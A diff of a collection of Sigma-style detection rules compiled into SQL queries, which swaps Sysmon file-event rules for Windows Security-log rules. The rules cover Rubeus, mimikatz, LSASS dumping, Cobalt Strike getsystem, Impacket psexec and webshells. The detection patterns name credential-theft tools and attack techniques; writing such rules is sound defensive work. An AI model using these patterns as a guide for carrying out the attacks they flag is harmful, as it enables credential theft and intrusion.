Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files 
\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": 
"ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": 
"Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to 
CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": 
"c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where 
the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write 
scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - 
"attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE 
'%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - 